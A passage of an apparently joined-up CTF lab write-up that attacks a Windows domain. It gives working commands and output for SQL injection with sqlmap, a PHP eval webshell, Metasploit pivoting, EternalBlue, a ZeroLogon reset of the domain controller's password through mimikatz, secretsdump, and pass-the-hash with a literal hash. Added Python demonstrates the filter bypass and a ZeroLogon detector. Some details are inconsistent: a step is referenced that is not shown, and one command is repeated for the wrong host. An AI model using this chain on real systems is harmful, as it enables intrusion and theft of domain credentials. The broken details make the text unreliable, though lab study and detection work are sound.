C:\phpstudy_pro\WWW\upload\img>fscan.exe -h 192.168.20.0/24
fscan.exe -h 192.168.20.0/24
fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10   is alive
(icmp) Target 192.168.20.20   is alive
(icmp) Target 192.168.20.30   is alive
[*] Icmp alive hosts len is: 3
192.168.20.10:445 open
192.168.20.20:139 open
192.168.20.20:135 open
192.168.20.30:88 open
192.168.20.20:8080 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.30:139 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.10:135 open
192.168.20.20:8009 open
192.168.20.10:7680 open
[*] alive ports len is: 14
start vulscan
[+] NetInfo:
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[+] NetInfo:
[*]192.168.20.30
   [->]WIN-7NRTJO59O7N
   [->]192.168.20.30
[*] 192.168.20.30  [+]DC __MSBROWSE__\WIN-7NRTJO59O7N
[*] 192.168.20.20  CYBERSTRIKELAB\CYBERWEB          Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://192.168.20.20:8080 code:200 len:1554   title:Welcome to JBoss AS
[+] InfoScan:http://192.168.20.20:8080 [Jboss]
已完成 14/14
[*] 扫描结束,耗时: 18.7052044s
```

Set up routing and configure the proxy:

```
meterpreter > run post/multi/manage/autoroute

[*] Running module against DESKTOP-JFB57A8 (192.168.10.10)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.20.0/255.255.255.0 from host's routing table.
meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/handler) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
```

Edit the proxychains4 configuration file so that traffic is proxied through msf:

```
┌──(root㉿kali)-[/data/demo]
└─# tail /etc/proxychains4.conf
#       socks4  192.168.1.49    1080
#       http    192.168.39.93   8080
#       rted: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
```

This gives access to the JBoss CMS on the internal network. It can be exploited with a JBoss all-in-one exploitation tool to obtain the second flag.

Third host: command execution via EternalBlue. A reverse shell and the other options did not work:

```
use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.20.30
set COMMAND type C:\\flag.txt
run
```

The final flag: go-flag{Cfg8hlBj4dXppo5j}
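The double-write bypass in the SQL injection step works because the keyword filter deletes each blocked word in a single pass, so the inner "select" of "seselectlect" survives. As an added example (not from the original post and not BEESCMS code), the Python below models such a filter, shows a double-written input passing through it into a concatenated query, and contrasts that with a parameterised query that needs no blacklist at all. The table, row and input string are constructed for the demo; the blocked-keyword list is an assumption, not the CMS's real filter.

```python
import re
import sqlite3

# Keyword blacklist modelled on the behaviour the lab shows: each word is
# deleted, but only in a single pass over the input (assumed list).
BLOCKED_KEYWORDS = ("select", "union", "from", "where")

# Constructed input built from the double-write mapping in the post
# (uniunionon -> union, seselectlect -> select, frfromom -> from).
INJECTED_NAME = "x' uniunionon seselectlect id, admin_password frfromom bees_admin--"


def strip_keywords_once(value: str) -> str:
    """Single-pass blacklist: removing 'select' from 'seselectlect' leaves 'select'."""
    for kw in BLOCKED_KEYWORDS:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


def strip_keywords_until_stable(value: str) -> str:
    """Repeating the filter to a fixed point closes the double-write trick, but it
    is still a blacklist: any keyword that is not listed passes straight through."""
    while True:
        cleaned = strip_keywords_once(value)
        if cleaned == value:
            return cleaned
        value = cleaned


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS admin table (constructed, not real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bees_admin (id INTEGER, admin_name TEXT, admin_password TEXT)")
    con.execute("INSERT INTO bees_admin VALUES (1, 'admin', 'md5-placeholder')")
    con.commit()
    return con


def login_concatenated(con: sqlite3.Connection, admin_name: str) -> list:
    """Vulnerable pattern: the filtered value is still spliced into the SQL text,
    so whatever survives the filter runs as SQL. With INJECTED_NAME the UNION
    returns the password column through the admin_name column."""
    sql = ("SELECT id, admin_name FROM bees_admin WHERE admin_name='"
           + strip_keywords_once(admin_name) + "' LIMIT 1")
    return con.execute(sql).fetchall()


def login_parameterised(con: sqlite3.Connection, admin_name: str) -> list:
    """Fixed pattern: the value is bound as a parameter, so it can only ever be
    compared as a string and the blacklist becomes unnecessary."""
    sql = "SELECT id, admin_name FROM bees_admin WHERE admin_name=? LIMIT 1"
    return con.execute(sql, (admin_name,)).fetchall()


if __name__ == "__main__":
    con = build_demo_db()
    print("after one pass :", strip_keywords_once(INJECTED_NAME))
    print("concatenated   :", login_concatenated(con, INJECTED_NAME))
    print("parameterised  :", login_parameterised(con, INJECTED_NAME))
```

Iterating the filter to a fixed point is shown only to make the point that it is the wrong layer: the parameterised query is the actual fix, and it is the one that stays correct when the next unlisted keyword turns up.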
2025-12-10
[Domain Penetration] cyberstrikelab-Lab4: obtaining domain controller privileges with the ZeroLogon vulnerability
cyberstrikelab-Lab4

Web penetration

Port 5820 is the web service. SQL injection (reference: https://www.cnblogs.com/shamaxian/p/19319207):

```
sqlmap -u "http://192.168.10.10:5820/ad_js.php?ad_id=1" -p ad_id --dump
```

Credentials: admin / admin123456. Log in to the backend at /admin.

Getshell by directly modifying the source. POC reference: https://blog.csdn.net/cainsoftware/article/details/119116430

```
http://192.168.10.10:5820/admin/tpl_manage.php?act=edit&tpl_name=../../ann.php
```

Change the content to:

```php
<?php @eval($_POST['a']);?>
```

```
msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set LHOST 192.168.10.10; set LPORT 4444; exploit -j -z"
```

Internal network penetration

getuid shows the session already runs as SYSTEM:

```
msf exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.10.10:4444
[*] Sending stage (177734 bytes) to 192.168.10.10
[*] Meterpreter session 4 opened (10.10.10.173:43577 -> 192.168.10.10:4444) at 2025-12-09 22:07:22 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Upload fscan and scan the internal network; port 7001 (WebLogic) is found:

```
meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
[*] Uploading  : /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe
[*] Uploaded 5.18 MiB of 5.18 MiB (100.0%): /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe
[*] Completed  : /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe -> fscan.exe
meterpreter > shell
Process 2316 created.
Channel 2 created.
Microsoft Windows [版本 10.0.18363.592]
(c) 2019 Microsoft Corporation。保留所有权利。

C:\phpstudy_pro\WWW>chcp 65001
chcp 65001
Active code page: 65001

C:\phpstudy_pro\WWW>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter 以太网实例 0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::1dfe:1621:b57c:7f61%17
   IPv4 Address. . . . . . . . . . . : 192.168.10.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.233

Ethernet adapter 以太网实例 0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::402e:23ec:6cb6:e625%16
   IPv4 Address. . . . . . . . . . . : 192.168.20.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1

C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.0/24
fscan.exe -h 192.168.20.0/24
fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10   is alive
(icmp) Target 192.168.20.20   is alive
(icmp) Target 192.168.20.30   is alive
[*] Icmp alive hosts len is: 3
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:3306 open
192.168.20.30:88 open
192.168.20.10:7680 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.10:135 open
192.168.20.10:139 open
192.168.20.20:139 open
192.168.20.30:135 open
192.168.20.20:135 open
192.168.20.20:7001 open
[*] alive ports len is: 13
start vulscan
[*] 192.168.20.30  [+]DC __MSBROWSE__\WIN-7NRTJO59O7N
[+] NetInfo:
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[*] 192.168.20.20  CYBERSTRIKELAB\CYBERWEB          Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://192.168.20.20:7001 code:404 len:1164   title:Error 404--Not Found
[+] InfoScan:http://192.168.20.20:7001 [weblogic]
已完成 13/13
[*] 扫描结束,耗时: 24.8144105s
```

Configure routing:

```
meterpreter > run post/multi/manage/autoroute

[*] Running module against DESKTOP-JFB57A8 (192.168.10.10)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.20.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.10.0       255.255.255.0      Session 4
   192.168.20.0       255.255.255.0      Session 4
```

Set up the proxy:

```
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j
```

WebLogic (several attempts with msf did not succeed).

Domain penetration

ZeroLogon (CVE-2020-1472) is one of the most severe Windows vulnerabilities disclosed in recent years, with a CVSS v3.0 score of 10.0. An attacker only needs the domain controller's hostname and IP and network access to it; with no credentials at all (and even from outside the domain) they can obtain domain administrator privileges.

Enumerate the domain host information: the domain name is cyberstrikelab.com and the Windows hostname is WIN-7NRTJO59O7N. The line `Derived membership: domain member` shows that the host is a member of the domain.

```
┌──(root㉿kali)-[~]
└─# proxychains enum4linux-ng -A 192.168.20.30 -C
 ============================================================
|    Domain Information via SMB session for 192.168.20.30    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.20.30:445  ...  OK
[+] Found domain information via SMB
NetBIOS computer name: WIN-7NRTJO59O7N
NetBIOS domain name: CYBERSTRIKELAB
DNS domain: cyberstrikelab.com
FQDN: WIN-7NRTJO59O7N.cyberstrikelab.com
Derived membership: domain member
Derived domain: CYBERSTRIKELAB
```

Upload mimikatz.exe:

```
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
```

A recent mimikatz build is needed; older versions do not have this module. Running the check shows that ZeroLogon is present:

```
mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$" exit
```

Reset the domain controller's machine account hash:

```
mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntml /null /account:WIN-7NRTJO59O7N$ /exploit" exit
```

Extract the domain hashes. Only the NTDS section (domain-level data) is pulled, skipping local data such as the SAM and LSA secrets, so the output is the hashes of all domain users and domain machine accounts:

```
proxychains impacket-secretsdump CYBERSTRIKELAB/WIN-7NRTJO59O7N\$@192.168.20.30 -no-pass -just-dc
```

Pass the hash to the domain controller to get the third flag:

```
proxychains impacket-psexec -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/Administrator@192.168.20.30
```

Pass the hash to the other machine to get the second flag:

```
proxychains impacket-psexec -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/Administrator@192.168.20.30
```
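For the defending side of the ZeroLogon step: an added example, not from the original post, of the detection logic a SOC would run over Windows Security events. The machine-account password reset shown above is recorded on the domain controller as Event 4742 (a computer account was changed) with ANONYMOUS LOGON as the subject and a new PasswordLastSet value; in addition, Microsoft's CVE-2020-1472 update added Netlogon events 5827/5828 (vulnerable secure-channel connection denied on a patched DC) and 5829 (vulnerable connection allowed while enforcement is off). The sample records and their field names are constructed for this example, and DC_ACCOUNTS is an assumed list of the domain controllers' computer accounts.

```python
from collections import Counter

# Assumed: computer accounts of the domain controllers in scope.
DC_ACCOUNTS = {"WIN-7NRTJO59O7N$"}

# Constructed sample records in the shape of normalised Windows Security events
# as a SIEM might store them. Only the fields the detection reads are present.
SAMPLE_EVENTS = [
    # Routine: an admin resets a workstation's computer-account password.
    {"event_id": 4742, "computer": "WIN-7NRTJO59O7N", "subject_user": "Administrator",
     "subject_domain": "CYBERSTRIKELAB", "target_user": "CYBERWEB$",
     "password_last_set": "12/10/2025 09:12:00"},
    # Routine: a 4742 that changed some attribute other than the password.
    {"event_id": 4742, "computer": "WIN-7NRTJO59O7N", "subject_user": "Administrator",
     "subject_domain": "CYBERSTRIKELAB", "target_user": "CYBERWEB$",
     "password_last_set": "-"},
    # ZeroLogon trace: the DC's own computer-account password set by ANONYMOUS LOGON.
    {"event_id": 4742, "computer": "WIN-7NRTJO59O7N", "subject_user": "ANONYMOUS LOGON",
     "subject_domain": "NT AUTHORITY", "target_user": "WIN-7NRTJO59O7N$",
     "password_last_set": "12/10/2025 09:15:33"},
    # Netlogon telemetry: vulnerable secure-channel connection denied (patched DC).
    {"event_id": 5827, "computer": "WIN-7NRTJO59O7N", "subject_user": "WIN-7NRTJO59O7N$",
     "client_ip": "192.168.10.10"},
    # Netlogon telemetry: vulnerable connection allowed (enforcement not yet on).
    {"event_id": 5829, "computer": "WIN-7NRTJO59O7N", "subject_user": "WIN-7NRTJO59O7N$",
     "client_ip": "192.168.10.10"},
]

RULE_ANON_RESET = "computer-account password set by ANONYMOUS LOGON"
RULE_DENIED = "vulnerable Netlogon connection denied (patched DC)"
RULE_ALLOWED = "vulnerable Netlogon connection allowed (enforcement off)"


def is_anonymous_computer_password_reset(e: dict) -> bool:
    """True for a 4742 whose subject is ANONYMOUS LOGON, whose target is a
    computer account, and where a new PasswordLastSet value was recorded."""
    return (e.get("event_id") == 4742
            and e.get("subject_user", "").upper() == "ANONYMOUS LOGON"
            and e.get("target_user", "").endswith("$")
            and e.get("password_last_set", "-") != "-")


def detect_zerologon(events: list) -> list:
    """Return one alert per matching event. A reset of a DC's own account is
    critical; any other computer account is high; the Netlogon events are
    graded by whether the DC blocked the connection or let it through."""
    alerts = []
    for e in events:
        if is_anonymous_computer_password_reset(e):
            severity = "critical" if e["target_user"] in DC_ACCOUNTS else "high"
            alerts.append({"severity": severity, "rule": RULE_ANON_RESET, "event": e})
        elif e.get("event_id") in (5827, 5828):
            alerts.append({"severity": "high", "rule": RULE_DENIED, "event": e})
        elif e.get("event_id") == 5829:
            alerts.append({"severity": "medium", "rule": RULE_ALLOWED, "event": e})
    return alerts


def summarise(alerts: list) -> Counter:
    """Count alerts per rule, which is what a daily report would show."""
    return Counter(a["rule"] for a in alerts)


if __name__ == "__main__":
    found = detect_zerologon(SAMPLE_EVENTS)
    for a in found:
        ev = a["event"]
        print(f"[{a['severity']}] {a['rule']}: event {ev['event_id']} on {ev['computer']}, "
              f"subject {ev['subject_user']}, source {ev.get('client_ip', ev.get('target_user'))}")
    print(dict(summarise(found)))
```

A 5829 by itself only says that a client still speaks the insecure Netlogon variant and the DC is not yet enforcing secure RPC; a 4742 from ANONYMOUS LOGON against a DC account is the actual exploitation signal and should page someone.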